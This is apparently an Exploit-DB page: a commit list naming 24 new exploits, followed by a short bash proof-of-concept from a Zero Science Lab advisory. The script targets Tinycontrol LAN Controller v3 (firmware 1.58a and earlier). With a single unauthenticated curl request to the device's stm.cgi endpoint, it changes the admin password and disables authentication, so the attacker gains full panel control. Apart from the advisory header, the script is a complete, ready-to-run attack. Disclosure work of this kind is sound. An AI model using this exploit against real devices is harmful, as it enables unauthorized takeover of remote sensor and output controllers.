f3649a641f
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
62 lines
No EOL
1.8 KiB
Bash
62 lines
No EOL
1.8 KiB
Bash
#!/bin/bash
|
|
: "
|
|
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
|
|
Exploit Author: LiquidWorm
|
|
|
|
Vendor: Tinycontrol
|
|
Product web page: https://www.tinycontrol.pl
|
|
Affected version: <=1.58a, HW 3.8
|
|
|
|
Summary: Lan Controller is a very universal
|
|
device that allows you to connect many different
|
|
sensors and remotely view their readings and
|
|
remotely control various types of outputs.
|
|
It is also possible to combine both functions
|
|
into an automatic if -> this with a calendar
|
|
when -> then. The device provides a user interface
|
|
in the form of a web page. The website presents
|
|
readings of various types of sensors: temperature,
|
|
humidity, pressure, voltage, current. It also
|
|
allows you to configure the device, incl. event
|
|
setting and controlling up to 10 outputs. Thanks
|
|
to the support of many protocols, it is possible
|
|
to operate from smartphones, collect and observ
|
|
the results on the server, as well as cooperation
|
|
with other I/O systems based on TCP/IP and Modbus.
|
|
|
|
Desc: The application suffers from an insecure access
|
|
control allowing an unauthenticated attacker to
|
|
change accounts passwords and bypass authentication
|
|
gaining panel control access.
|
|
|
|
Tested on: lwIP
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2023-5787
|
|
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php
|
|
|
|
|
|
18.08.2023
|
|
|
|
"
|
|
|
|
set -euo pipefail
|
|
IFS=$'\n\t'
|
|
|
|
if [ $# -ne 2 ]; then
|
|
echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
|
|
exit
|
|
fi
|
|
|
|
IP=$1
|
|
PW=$2
|
|
|
|
EN=$(echo -n $PW | base64)
|
|
|
|
curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
|
|
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
|
|
echo -ne '\nAdmin password changed to: '$PW |